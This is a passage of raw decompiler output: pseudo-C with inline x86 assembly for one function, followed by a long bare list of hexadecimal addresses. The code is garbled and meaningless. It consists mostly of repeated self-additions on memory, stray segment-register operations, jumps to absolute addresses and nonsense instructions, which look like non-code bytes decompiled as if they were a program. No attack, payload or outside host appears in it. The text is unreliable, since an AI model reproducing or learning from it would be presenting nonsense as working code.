      				 *_t384 =  *_t384 + _t384;
      				 *_t384 =  *_t384 + _t384;
      				ss = ss;
      				asm("arpl [ecx], ax");
      				 *[fs:eax] =  *[fs:eax] + _t384;
      				 *_t384 =  *_t384 + _t384;
      				 *_t449 =  *_t449 + _t384;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t384;
      				 *((intOrPtr*)(_t384 + _t384 - 0x50)) =  *((intOrPtr*)(_t384 + _t384 - 0x50)) + _t384;
      				asm("aaa");
      				 *_t384 =  *_t384 + _t384;
      				 *_t384 =  *_t384 + _t384;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t385 = _t384 |  *_t384;
      				asm("o16 add [eax], al");
      				 *_t385 =  *_t385 + _t385;
      				 *_t449 =  *_t449 + _t385;
      				_t480 = _t474 + _t556 + _t556 + _t556 + _t556 + _t556 + _t556;
      				_push(ss);
      				_t387 = _t480 +  *_t480 * 0x66;
      				asm("aaa");
      				 *_t387 =  *_t387 + _t387;
      				 *_t387 =  *_t387 + _t387;
      				_t516 = _t512 + _t384 + _t384 + _t385 + _t387;
      				ss = ss;
      				if(_t516 < 0) {
      					 *((intOrPtr*)(_t449 + _t556)) =  *((intOrPtr*)(_t449 + _t556)) + _t387;
      				}
      				 *_t387 =  *_t387 + _t387;
      				 *_t387 =  *_t387 + _t387;
      				 *_t449 =  *_t449 + _t387;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t387;
      				 *_t387 = _t480 +  *_t387;
      				 *_t387 =  *_t387 + _t387;
      				 *_t387 =  *_t387 + _t387;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t388 = _t387 |  *_t387;
      				_push(0);
      				 *_t388 =  *_t388 + _t388;
      				 *_t388 =  *_t388 + _t388;
      				_t389 = _t388 +  *_t388;
      				 *_t480 = 0xf1;
      				_push(ss);
      				if(_t389 == 0) {
      					_push(0);
      				}
      				_t390 = _t389 + _t516;
      				asm("aaa");
      				 *_t390 =  *_t390 + _t390;
      				 *_t390 =  *_t390 + _t390;
      				_push(ss);
      				_t391 = _t390 + _t449;
      				_push(ss);
      				 *_t480 =  *_t480 + 0x6b;
      				 *_t391 =  *_t391 + _t391;
      				 *_t391 =  *_t391 + _t391;
      				 *((intOrPtr*)(_t449 - 0x7ae7f800)) =  *((intOrPtr*)(_t449 - 0x7ae7f800)) + _t516;
      				 *((intOrPtr*)(_t391 + _t391)) =  *((intOrPtr*)(_t391 + _t391)) + _t559;
      				 *_t391 =  *_t391 + _t391;
      				 *_t449 =  *_t449 + _t391;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t391;
      				 *_t559 =  *_t559 + _t480;
      				_t392 = _t391 + 0x38;
      				 *_t392 =  *_t392 + _t392;
      				 *_t392 =  *_t392 + _t392;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t393 = _t392 |  *_t392;
      				asm("outsd");
      				 *_t393 =  *_t393 + _t393;
      				 *_t393 =  *_t393 + _t393;
      				 *_t449 =  *_t449 + _t393;
      				_t481 = _t480 + _t556;
      				_push(ss);
      				_t394 = _t516 + _t393;
      				_t518 = _t393;
      				 *_t538 =  *_t538 + _t559;
      				asm("sbb al, 0x38");
      				 *_t394 =  *_t394 + _t394;
      				 *_t394 =  *_t394 + _t394;
      				_push(ss);
      				_t395 = _t394 + _t449;
      				_push(ss);
      				asm("cdq");
      				 *_t395 =  *_t395 + _t556;
      				_t396 = _t395 - 0x38;
      				 *_t396 =  *_t396 + _t396;
      				 *_t396 =  *_t396 + _t396;
      				_t397 = _t449;
      				_t450 = _t396;
      				 *_t397 =  *_t397 + _t481;
      				asm("sbb [eax+0x7101], ah");
      				 *_t397 =  *_t397 + _t397;
      				 *_t450 =  *_t450 + _t397;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t397;
      				 *_t518 =  *_t518 + _t518;
      				 *_t397 =  *_t397 ^ _t450;
      				 *_t397 =  *_t397 + _t397;
      				 *_t397 =  *_t397 + _t397;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t398 = _t397 |  *_t397;
      				if (_t398 == 0) goto L11;
      				 *_t398 =  *_t398 + _t398;
      				 *_t398 =  *_t398 + _t398;
      				_t399 = _t398 +  *_t398;
      				 *_t481 = 0xf1;
      				_push(ss);
      				asm("lodsd");
      				 *((intOrPtr*)(_t399 + _t399 + 0x48)) =  *((intOrPtr*)(_t399 + _t399 + 0x48)) + _t556;
      				 *_t399 =  *_t399 + _t399;
      				 *_t556 =  *_t556 + _t518;
      				_t400 = _t399 + _t450;
      				if (_t400 <= 0) goto L12;
      				 *_t400 =  *_t400 + _t400;
      				 *_t400 =  *_t400 + _t400;
      				_t401 = _t400 +  *_t400;
      				_t452 =  *_t401;
      				 *_t401 = 1;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *_t401 =  *_t401 + _t452;
      				_t402 = ss;
      				 *_t402 =  *_t402 + _t402;
      				 *_t481 =  *_t481 + _t518;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t518 =  *_t518 + _t452;
      				 *_t402 =  *_t402 + _t402;
      				 *_t402 =  *_t402 + _t402;
      				_t403 = _t402 +  *_t402;
      				 *_t481 = 0xf1;
      				_t557 = 0x70007a01;
      				 *_t403 =  *_t403 + _t403;
      				 *0x70007a01 =  *0x70007a01 + _t518;
      				_t519 = _t518 + _t403;
      				ss = ss;
      				asm("lds eax, [ecx]");
      				if (_t519 != 0) goto L13;
      				 *_t403 =  *_t403 + _t403;
      				 *_t403 =  *_t403 + _t403;
      				_t404 = _t403 +  *_t403;
      				_t453 =  *_t404;
      				 *_t404 = _t452;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *((intOrPtr*)(_t404 + _t404 - 0x80)) =  *((intOrPtr*)(_t404 + _t404 - 0x80)) + _t453;
      				 *_t404 =  *_t404 + _t404;
      				 *_t481 =  *_t481 + _t519;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *0x70007a01 =  *0x70007a01 + _t453;
      				 *_t404 =  *_t404 + _t404;
      				 *_t404 =  *_t404 + _t404;
      				_t405 = _t404 +  *_t404;
      				 *_t481 = 0xf1;
      				_push(ss);
      				asm("rol dword [ecx], 1");
      				if (_t405 <= 0) goto L14;
      				_t406 = _t405;
      				 *_t406 =  *_t406 + _t406;
      				 *0x70007a01 =  *0x70007a01 + _t519;
      				_t407 = _t406 + _t453;
      				_push(ss);
      				asm("xlatb");
      				 *_t407 =  *_t407 + _t407;
      				 *_t453 =  *_t453 + _t407;
      				 *0x0B0EDD19 =  *((intOrPtr*)(0xb0edd19)) + _t407;
      				 *((intOrPtr*)(_t519 + 0x38a800)) =  *((intOrPtr*)(_t519 + 0x38a800)) + _t407;
      				 *_t407 =  *_t407 + _t407;
      				 *_t481 =  *_t481 + _t519;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *((intOrPtr*)(_t407 + _t407)) =  *((intOrPtr*)(_t407 + _t407)) + _t407;
      				_t408 = _t407 +  *_t407;
      				 *_t481 = 0xf1;
      				asm("loop 0x3");
      				 *_t408 =  *_t408 >> 0;
      				 *_t408 =  &(_t408[ *_t408]);
      				 *0x70007a01 =  *0x70007a01 + _t519;
      				_t520 = _t519 + _t408;
      				ss = ss;
      				goto 0xd033e7e4;
      				 *_t408 =  &(_t408[ *_t408]);
      				 *0x70007a01 =  *0x70007a01 + _t520;
      				_push(ss);
      				_t409 =  &(_t408[_t453]);
      				_push(ss);
      				goto 0x33eaf2;
      				 *_t409 =  *_t409 + _t409;
      				 *_t453 =  *_t453 + _t409;
      				 *((intOrPtr*)(0xb0edd19)) =  *((intOrPtr*)(0xb0edd19)) + _t409;
      				 *((intOrPtr*)(_t559 + 0x38e000)) =  *((intOrPtr*)(_t559 + 0x38e000)) + _t481;
      				 *_t409 =  *_t409 + _t409;
      				 *_t481 =  *_t481 + _t520;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t538 =  *_t538 + _t481;
      				 *_t453 =  *_t453 + _t409;
      				_t521 = _t520 + _t409;
      				_t482 = _t481 + 0x70007a01;
      				_push(ss);
      				if(_t482 == 0) {
      					_pop( *__eax);
      				}
      				_t410 = _t409 + _t453;
      				 *_t410 =  *_t410 + _t410;
      				 *_t557 =  *_t557 + _t521;
      				_t411 = _t410 + _t453;
      				_push(ss);
      				 *_t482 =  *_t482 + 0x90;
      				 *_t411 =  *_t411 + _t411;
      				 *_t411 =  *_t411 + _t411;
      				 *_t453 =  *_t453 + _t411;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t411;
      				 *((intOrPtr*)(_t482 + 0x390800)) =  *((intOrPtr*)(_t482 + 0x390800)) + _t521;
      				 *_t411 =  *_t411 + _t411;
      				 *_t482 =  *_t482 + _t521;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t453 =  *_t453 + _t521;
      				 *_t453 =  *_t453 + _t411;
      				_t522 = _t521 + _t411;
      				_t483 = _t482 + _t557;
      				_push(ss);
      				asm("cli");
      				 *((intOrPtr*)(_t453 + 0x392000)) =  *((intOrPtr*)(_t453 + 0x392000)) + _t522;
      				 *_t411 =  *_t411 + _t411;
      				 *_t557 =  *_t557 + _t522;
      				_t412 = _t411 + _t453;
      				_push(ss);
      				_t454 = _t453 +  *_t483;
      				 *_t454 =  *_t454 + _t412;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t412;
      				 *((intOrPtr*)(_t538 + 0x393400)) =  *((intOrPtr*)(_t538 + 0x393400)) + _t454;
      				 *_t412 =  *_t412 + _t412;
      				 *_t483 =  *_t483 + _t522;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t483 =  *_t483 + _t412;
      				 *_t454 =  *_t454 + _t412;
      				_t523 = _t522 + _t412;
      				_t484 = _t483 + _t557;
      				ss = ss;
      				_t413 = _t412 +  *((intOrPtr*)(_t484 + 0x394c00));
      				 *_t413 =  *_t413 + _t413;
      				 *_t557 =  *_t557 + _t523;
      				_t524 = _t523 + _t413;
      				ss = es;
      				asm("sbb eax, 0x5c00a202");
      				 *_t413 =  *_t413 + _t413;
      				 *((intOrPtr*)(_t454 + 0x23171a00)) =  *((intOrPtr*)(_t454 + 0x23171a00)) + _t524;
      				_t414 = _t413 +  *_t454;
      				 *_t454 =  *_t454 + _t414;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t414;
      				 *((intOrPtr*)(_t414 + _t414 + 0x3964)) =  *((intOrPtr*)(_t414 + _t414 + 0x3964)) + _t414;
      				 *_t414 =  *_t414 + _t414;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t415 = _t414 |  *_t414;
      				asm("cmpsb");
      				 *_t415 =  *_t415 + _t415;
      				 *_t415 =  *_t415 + _t415;
      				 *_t454 =  *_t454 + _t415;
      				_t525 = _t524 + _t415;
      				_t485 = _t484 + _t557;
      				_push(ss);
      				 *_t525 =  *_t525 ^ _t415;
      				asm("cmpsb");
      				 *((intOrPtr*)(_t485 + _t538)) =  *((intOrPtr*)(_t485 + _t538)) + _t454;
      				 *_t415 =  *_t415 + _t415;
      				 *_t557 =  *_t557 + _t525;
      				_t416 = _t415 + _t454;
      				_push(ss);
      				asm("stosb");
      				 *_t416 =  *_t416 + _t416;
      				 *_t416 =  *_t416 + _t416;
      				 *_t454 =  *_t454 + _t416;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t416;
      				 *((intOrPtr*)(_t557 + 0x398c00)) =  *((intOrPtr*)(_t557 + 0x398c00)) + _t485;
      				 *_t416 =  *_t416 + _t416;
      				 *_t485 =  *_t485 + _t525;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t416 = _t525 +  *_t416;
      				 *_t454 =  *_t454 + _t416;
      				_t487 = _t485 + _t557 - 1;
      				_t527 = _t525 + _t416 +  *((intOrPtr*)(_t416 + 0x39a400));
      				 *_t416 =  *_t416 + _t416;
      				 *_t557 =  *_t557 + _t527;
      				ss = ss;
      				_t539 = _t538 - 1;
      				_t529 = _t527 + _t416 +  *((intOrPtr*)(_t487 + 0x39b400));
      				 *_t416 =  *_t416 + _t416;
      				 *((intOrPtr*)(_t454 + 0x55171a00)) =  *((intOrPtr*)(_t454 + 0x55171a00)) + _t529;
      				_t530 = _t529 +  *((intOrPtr*)(_t529 + 0x39bc00));
      				 *_t416 =  *_t416 + _t416;
      				 *((intOrPtr*)(_t454 + 0x5b180800)) =  *((intOrPtr*)(_t454 + 0x5b180800)) + _t530;
      				 *_t454 =  *_t454 + _t416;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t416;
      				 *((intOrPtr*)(_t416 + _t416 + 0x39c0)) =  *((intOrPtr*)(_t416 + _t416 + 0x39c0)) + _t530 +  *_t454;
      				 *_t416 =  *_t416 + _t416;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t417 = _t416 |  *_t416;
      				 *_t417 =  *_t417 + _t417;
      				 *_t417 =  *_t417 + _t417;
      				_t418 = _t417 +  *_t417;
      				 *_t487 = 0xf1;
      				asm("o16 add dh, [esi+0x39d800]");
      				 *_t418 =  *_t418 + _t418;
      				 *_t557 =  *_t557;
      				_t533 = 0 + _t418;
      				ss = ss;
      				asm("insb");
      				_t455 = _t454 +  *_t418;
      				 *_t455 =  *_t455 + _t418;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t418;
      				 *((intOrPtr*)(_t533 + 0x39e800)) =  *((intOrPtr*)(_t533 + 0x39e800)) + _t455;
      				 *_t418 =  *_t418 + _t418;
      				 *_t487 =  *_t487 + _t533;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *((intOrPtr*)(_t418 + _t418)) =  *((intOrPtr*)(_t418 + _t418)) + _t455;
      				_t419 = _t418 +  *_t418;
      				 *_t487 = 0xf1;
      				_push(ss);
      				if(_t419 <= 0) {
      				}
      				 *_t533 =  *_t533 + _t455;
      				 *_t419 =  *_t419 + _t419;
      				 *_t419 =  *_t419 + _t419;
      				_t534 = _t533 + _t419;
      				ss = ss;
      				if(_t534 > 0) {
      					_t557 = 0x3a1000;
      				}
      				asm("adc [edx], bh");
      				 *_t419 =  *_t419 + _t419;
      				 *_t419 =  *_t419 + _t419;
      				_t420 = _t455;
      				_t456 = _t419;
      				 *((intOrPtr*)(_t539 + _t534)) =  *((intOrPtr*)(_t539 + _t534)) + _t456;
      				 *_t487 =  *_t487 + _t420;
      				asm("rol byte [eax], 0x0");
      				 *_t420 =  *_t420 + _t420;
      				 *_t456 =  *_t456 + _t420;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t420;
      				_t421 = _t420 + _t420;
      				 *_t421 =  *_t421 + _t456;
      				 *_t421 =  *_t421 + _t421;
      				 *_t487 =  *_t487 + _t534;
      				asm("sbb [esi+ecx+0xa], bl");
      				_push(cs);
      				return _t421 |  *_t421;
      			}



















































































































































































      0x003358d3
      0x003358d3
      0x003358d4
      0x003358d5
      0x003358db
      0x003358e1
      0x003358e7
      0x003358ed
      0x003358f3
      0x003358f9
      0x003358fb
      0x003358fe
      0x00335905
      0x0033590b
      0x0033590f
      0x00335914
      0x0033591a
      0x0033591c
      0x0033591d
      0x00335921
      0x00335922
      0x00335923
      0x00335927
      0x00335928
      0x0033592b
      0x0033592d
      0x0033592e
      0x0033592e
      0x00335931
      0x0033593b
      0x0033593f
      0x00335946
      0x00335947
      0x0033594b
      0x00335953
      0x00335959
      0x0033595f
      0x00335963
      0x00335964
      0x0033596f
      0x00335975
      0x00335976
      0x00335977
      0x00335979
      0x0033597b
      0x0033597c
      0x0033597e
      0x0033597e
      0x00335980
      0x00335986
      0x00335988
      0x00335993
      0x003359a5
      0x003359a6
      0x003359a9
      0x003359c3
      0x003359c7
      0x003359c9
      0x003359e9
      0x003359ef
      0x003359f2
      0x003359f4
      0x003359f6
      0x003359fa
      0x003359fc
      0x003359fe
      0x003359ff
      0x00335a01
      0x00335a03
      0x00335a09
      0x00335a0b
      0x00335a0e
      0x00335a10
      0x00335a12
      0x00335a13
      0x00335a1c
      0x00335a1e
      0x00335a20
      0x00335a21
      0x00335a27
      0x00335a2a
      0x00335a2c
      0x00335a2e
      0x00335a2e
      0x00335a2f
      0x00335a35
      0x00335a3b
      0x00335a41
      0x00335a43
      0x00335a49
      0x00335a4f
      0x00335a53
      0x00335a55
      0x00335a57
      0x00335a5d
      0x00335a63
      0x00335a65
      0x00335a6b
      0x00335a6d
      0x00335a71
      0x00335a73
      0x00335a79
      0x00335a7b
      0x00335a7e
      0x00335a80
      0x00335a82
      0x00335a83
      0x00335a86
      0x00335a88
      0x00335a8a
      0x00335a8c
      0x00335a8e
      0x00335a90
      0x00335a90
      0x00335a91
      0x00335a97
      0x00335a9d
      0x00335aa3
      0x00335aa5
      0x00335aac
      0x00335aac
      0x00335aad
      0x00335aad
      0x00335ab2
      0x00335ab4
      0x00335aba
      0x00335aba
      0x00335abb
      0x00335abf
      0x00335ac5
      0x00335ac7
      0x00335acd
      0x00335ad3
      0x00335ad5
      0x00335adb
      0x00335ae1
      0x00335ae3
      0x00335ae9
      0x00335aeb
      0x00335aee
      0x00335af0
      0x00335af2
      0x00335af2
      0x00335af3
      0x00335af5
      0x00335af8
      0x00335afd
      0x00335aff
      0x00335b05
      0x00335b07
      0x00335b0a
      0x00335b0c
      0x00335b0e
      0x00335b0e
      0x00335b0f
      0x00335b12
      0x00335b13
      0x00335b15
      0x00335b18
      0x00335b1a
      0x00335b1c
      0x00335b1c
      0x00335b1d
      0x00335b21
      0x00335b23
      0x00335b2a
      0x00335b2a
      0x00335b2c
      0x00335b2e
      0x00335b2f
      0x00335b31
      0x00335b33
      0x00335b34
      0x00335b36
      0x00335b38
      0x00335b38
      0x00335b39
      0x00335b3f
      0x00335b45
      0x00335b4b
      0x00335b4e
      0x00335b4f
      0x00335b51
      0x00335b53
      0x00335b59
      0x00335b5c
      0x00335b5e
      0x00335b60
      0x00335b62
      0x00335b63
      0x00335b69
      0x00335b6c
      0x00335b6e
      0x00335b70
      0x00335b70
      0x00335b71
      0x00335b77
      0x00335b7a
      0x00335b7c
      0x00335b7e
      0x00335b7e
      0x00335b7f
      0x00335b85
      0x00335b89
      0x00335b8b
      0x00335b91
      0x00335b93
      0x00335b99
      0x00335b9f
      0x00335ba8
      0x00335ba8
      0x00335ba9
      0x00335bad
      0x00335baf
      0x00335bb2
      0x00335bb4
      0x00335bb6
      0x00335bb6
      0x00335bb8
      0x00335bba
      0x00335bbb
      0x00335bbd
      0x00335bbf
      0x00335bc2
      0x00335bc4
      0x00335bca
      0x00335bcc
      0x00335bce
      0x00335bd0
      0x00335bd2
      0x00335bd3
      0x00335bd7
      0x00335bd9
      0x00335be1
      0x00335be5
      0x00335be7
      0x00335be9
      0x00335beb
      0x00335bed
      0x00335bf3
      0x00335bf5
      0x00335bf8
      0x00335bfa
      0x00335bfc
      0x00335bfc
      0x00335bfd
      0x00335c01
      0x00335c03
      0x00335c05
      0x00335c07
      0x00335c09
      0x00335c0f
      0x00335c11
      0x00335c14
      0x00335c16
      0x00335c18
      0x00335c18
      0x00335c1a
      0x00335c1c
      0x00335c1d
      0x00335c1f
      0x00335c23
      0x00335c25
      0x00335c2b
      0x00335c2d
      0x00335c2f
      0x00335c31
      0x00335c33
      0x00335c39
      0x00335c42
      0x00335c45
      0x00335c46
      0x00335c48
      0x00335c4b
      0x00335c4d
      0x00335c4f
      0x00335c51
      0x00335c53
      0x00335c5e
      0x00335c5f
      0x00335c61
      0x00335c64
      0x00335c66
      0x00335c68
      0x00335c6a
      0x00335c6c
      0x00335c6e
      0x00335c70
      0x00335c71
      0x00335c7a
      0x00335c7d
      0x00335c80
      0x00335c82
      0x00335c84
      0x00335c88
      0x00335c8b
      0x00335c96
      0x00335c97
      0x00335c99
      0x00335c9f
      0x00335ca1
      0x00335ca3
      0x00335ca9
      0x00335cb2
      0x00335cb5
      0x00335cb8
      0x00335cba
      0x00335cbc
      0x00335cbe
      0x00335cc0
      0x00335cc3
      0x00335cc4
      0x00335cca
      0x00335ccc
      0x00335cce
      0x00335ccf
      0x00335cd2
      0x00335cd3
      0x00335cd5
      0x00335cd7
      0x00335cda
      0x00335cdd
      0x00335cdf
      0x00335ce0
      0x00335ce4
      0x00335ce6
      0x00335ce8
      0x00335cea
      0x00335cec
      0x00335cee
      0x00335cef
      0x00335cf5
      0x00335cf7
      0x00335cf9
      0x00335cfd
      0x00335cff
      0x00335d01
      0x00335d03
      0x00335d05
      0x00335d09
      0x00335d0c
      0x00335d0d
      0x00335d0f
      0x00335d12
      0x00335d14
      0x00335d15
      0x00335d17
      0x00335d1d
      0x00335d1f
      0x00335d21
      0x00335d27
      0x00335d29
      0x00335d2c
      0x00335d2e
      0x00335d30
      0x00335d33
      0x00335d34
      0x00335d3b
      0x00335d3d
      0x00335d3f
      0x00335d41
      0x00335d42
      0x00335d49
      0x00335d4b
      0x00335d4d
      0x00335d4f
      0x00335d50
      0x00335d52
      0x00335d55
      0x00335d57
      0x00335d59
      0x00335d5f
      0x00335d61
      0x00335d64
      0x00335d66
      0x00335d68
      0x00335d6b
      0x00335d6c
      0x00335d6f
      0x00335d71
      0x00335d73
      0x00335d75
      0x00335d77
      0x00335d79
      0x00335d7a
      0x00335d7b
      0x00335d7e
      0x00335d81
      0x00335d83
      0x00335d85
      0x00335d87
      0x00335d8b
      0x00335d8d
      0x00335d8f
      0x00335d91
      0x00335d97
      0x00335d9b
      0x00335d9e
      0x00335da0
      0x00335da3
      0x00335da4
      0x00335da6
      0x00335da7
      0x00335da9
      0x00335dab
      0x00335dad
      0x00335daf
      0x00335db1
      0x00335db2
      0x00335db3
      0x00335db8
      0x00335dba
      0x00335dbc
      0x00335dbd
      0x00335dbf
      0x00335dc3
      0x00335dc9
      0x00335dcf
      0x00335dd2
      0x00335dd5
      0x00335dd7
      0x00335ddd
      0x00335de0
      0x00335de2
      0x00335de4
      0x00335de6
      0x00335de7
      0x00335ded
      0x00335def
      0x00335df1
      0x00335df3
      0x00335df9
      0x00335dfd
      0x00335e00
      0x00335e02
      0x00335e05
      0x00335e06
      0x00335e08
      0x00335e09
      0x00335e0b
      0x00335e0d
      0x00335e0f
      0x00335e11
      0x00335e13
      0x00335e14
      0x00335e16
      0x00335e17
      0x00335e19
      0x00335e1c
      0x00335e1e
      0x00335e1f
      0x00335e21
      0x00335e22
      0x00335e23
      0x00335e26
      0x00335e28
      0x00335e2a
      0x00335e2c
      0x00335e2c
      0x00335e2e
      0x00335e30
      0x00335e31
      0x00335e34
      0x00335e35
      0x00335e38
      0x00335e3a
      0x00335e3d
      0x00335e3e
      0x00335e40
      0x00335e41
      0x00335e43
      0x00335e45
      0x00335e47
      0x00335e4c
      0x00335e4d
      0x00335e50
      0x00335e52
      0x00335e54
      0x00335e56
      0x00335e59
      0x00335e5a
      0x00335e5f
      0x00335e61
      0x00335e63
      0x00335e69
      0x00335e6c
      0x00335e6e
      0x00335e70
      0x00335e72
      0x00335e78
      0x00335e79
      0x00335e7b
      0x00335e7d
      0x00335e84
      0x00335e85
      0x00335e88
      0x00335e8a
      0x00335e8c
      0x00335e91
      0x00335e94
      0x00335e95
      0x00335e97
      0x00335e99
      0x00335e9b
      0x00335ea1
      0x00335ea4
      0x00335ea5
      0x00335ea6
      0x00335ea8
      0x00335eaa
      0x00335eae
      0x00335eb0
      0x00335eb1
      0x00335eb3
      0x00335eb5
      0x00335ebb
      0x00335ec1
      0x00335ec2
      0x00335ec4
      0x00335ec7
      0x00335ec9
      0x00335eca
      0x00335ecb
      0x00335ece
      0x00335ed0
      0x00335ed2
      0x00335ed4
      0x00335ed4
      0x00335ed6
      0x00335ed8
      0x00335ed9
      0x00335edc
      0x00335ede
      0x00335ee0
      0x00335ee2
      0x00335ee6
      0x00335ee8
      0x00335ee9
      0x00335eeb
      0x00335eed
      0x00335ef3
      0x00335ef4
      0x00335ef5
      0x00335ef9
      0x00335efa
      0x00335efc
      0x00335eff
      0x00335f01
      0x00335f03
      0x00335f06
      0x00335f08
      0x00335f0a
      0x00335f0c
      0x00335f0c
      0x00335f0e
      0x00335f10
      0x00335f11
      0x00335f14
      0x00335f16
      0x00335f18
      0x00335f1a
      0x00335f1c
      0x00335f1d
      0x00335f1e
      0x00335f20
      0x00335f23
      0x00335f25
      0x00335f2c
      0x00335f2d
      0x00335f31
      0x00335f32
      0x00335f34
      0x00335f39
      0x00335f3a
      0x00335f3c
      0x00335f3f
      0x00335f41
      0x00335f43
      0x00335f49
      0x00335f4d
      0x00335f4e
      0x00335f50
      0x00335f52
      0x00335f55
      0x00335f56
      0x00335f58
      0x00335f5b
      0x00335f5d
      0x00335f61
      0x00335f63
      0x00335f67
      0x00335f69
      0x00335f6a
      0x00335f6c
      0x00335f6f
      0x00335f71
      0x00335f72
      0x00335f74
      0x00335f74
      0x00335f75
      0x00335f77
      0x00335f79
      0x00335f7b
      0x00335f81
      0x00335f86
      0x00335f88
      0x00335f8a
      0x00335f8d
      0x00335f8e
      0x00335f90
      0x00335f92
      0x00335f94
      0x00335f96
      0x00335f98
      0x00335f9b
      0x00335f9c
      0x00335f9e
      0x00335f9e
      0x00335f9f
      0x00335fa1
      0x00335fa2
      0x00335fa4
      0x00335fa6
      0x00335fa7
      0x00335fa9
      0x00335faa
      0x00335fad
      0x00335fb1
      0x00335fb3
      0x00335fb9
      0x00335fbd
      0x00335fbf
      0x00335fc1
      0x00335fc7
      0x00335fca
      0x00335fcc
      0x00335fce
      0x00335fd0
      0x00335fd3
      0x00335fd4
      0x00335fd6
      0x00335fd7
      0x00335fd9
      0x00335fdb
      0x00335fdf
      0x00335fe1
      0x00335fe2
      0x00335fe2
      0x00335fe3
      0x00335fe6
      0x00335fe8
      0x00335fea
      0x00335fec
      0x00335fed
      0x00335fef
      0x00335ff0
      0x00335ff1
      0x00335ff4
      0x00335ff6
      0x00335ff8
      0x00335ffa
      0x00335ffa
      0x00335ffb
      0x00335ffd
      0x00336003
      0x00336005
      0x00336007
      0x0033600d
      0x00336010
      0x00336012
      0x00336014
      0x00336016
      0x00336019
      0x0033601a
      0x0033601c
      0x0033601e
      0x00336020
      0x00336022
      0x00336024
      0x00336027
      0x00336028
      0x00336029
      0x0033602f
      0x00336031
      0x00336033
      0x00336038
      0x0033603a
      0x0033603c
      0x0033603e
      0x00336040
      0x00336040
      0x00336042
      0x00336044
      0x00336045
      0x00336048
      0x0033604b
      0x0033604d
      0x0033604f
      0x00336053
      0x00336056
      0x00336058
      0x0033605a
      0x0033605c
      0x00336060
      0x00336067
      0x00336069
      0x0033606b
      0x0033606d
      0x0033606e
      0x00336070
      0x00336072
      0x00336074
      0x00336076
      0x00336078
      0x00336078
      0x0033607a
      0x0033607c
      0x0033607d
      0x00336083
      0x00336085
      0x00336087
      0x0033608b
      0x0033608e
      0x00336090
      0x00336092
      0x00336094
      0x00336097
      0x00336098
      0x0033609a
      0x0033609c
      0x0033609f
      0x003360a1
      0x003360a3
      0x003360a5
      0x003360a6
      0x003360a7
      0x003360ad
      0x003360af
      0x003360b5
      0x003360bb
      0x003360bd
      0x003360bf
      0x003360c3
      0x003360ca
      0x003360cc
      0x003360d0
      0x003360d4
      0x003360d7
      0x003360d9
      0x003360db
      0x003360dd
      0x003360de
      0x003360e5
      0x003360e7
      0x003360e8
      0x003360e9
      0x003360eb
      0x003360ec
      0x003360f1
      0x003360f3
      0x003360f5
      0x003360fb
      0x00336101
      0x00336103
      0x00336105
      0x00336109
      0x0033610f
      0x00336111
      0x00336113
      0x00336115
      0x00336116
      0x00336118
      0x00336118
      0x00336119
      0x0033611d
      0x0033611f
      0x00336121
      0x00336123
      0x00336124
      0x00336127
      0x00336129
      0x0033612b
      0x0033612d
      0x00336133
      0x00336139
      0x0033613b
      0x0033613d
      0x00336141
      0x00336147
      0x00336149
      0x0033614b
      0x0033614d
      0x0033614e
      0x0033614f
      0x00336155
      0x00336157
      0x00336159
      0x0033615b
      0x0033615d
      0x00336163
      0x00336165
      0x0033616b
      0x00336171
      0x00336173
      0x00336175
      0x00336179
      0x0033617f
      0x00336181
      0x00336183
      0x00336186
      0x00336187
      0x0033618d
      0x0033618f
      0x00336191
      0x00336193
      0x00336194
      0x0033619b
      0x0033619d
      0x003361a3
      0x003361a9
      0x003361ab
      0x003361b1
      0x003361b8
      0x003361ba
      0x003361bd
      0x003361be
      0x003361c0
      0x003361c1
      0x003361c3
      0x003361c5
      0x003361c7
      0x003361c9
      0x003361cb
      0x003361cc
      0x003361ce
      0x003361cf
      0x003361d3
      0x003361d5
      0x003361d7
      0x003361d9
      0x003361dc
      0x003361dd
      0x003361df
      0x003361e1
      0x003361e3
      0x003361e9
      0x003361ef
      0x003361f1
      0x003361f3
      0x003361f7
      0x003361fd
      0x00336204
      0x00336205
      0x0033620b
      0x0033620d
      0x00336211
      0x00336212
      0x00336213
      0x00336219
      0x0033621b
      0x00336221
      0x00336227
      0x00336229
      0x00336235
      0x00336237
      0x0033623d
      0x00336244
      0x00336246
      0x00336249
      0x0033624a
      0x0033624e
      0x00336250
      0x00336252
      0x00336254
      0x00336258
      0x0033625f
      0x00336261
      0x00336263
      0x00336265
      0x00336266
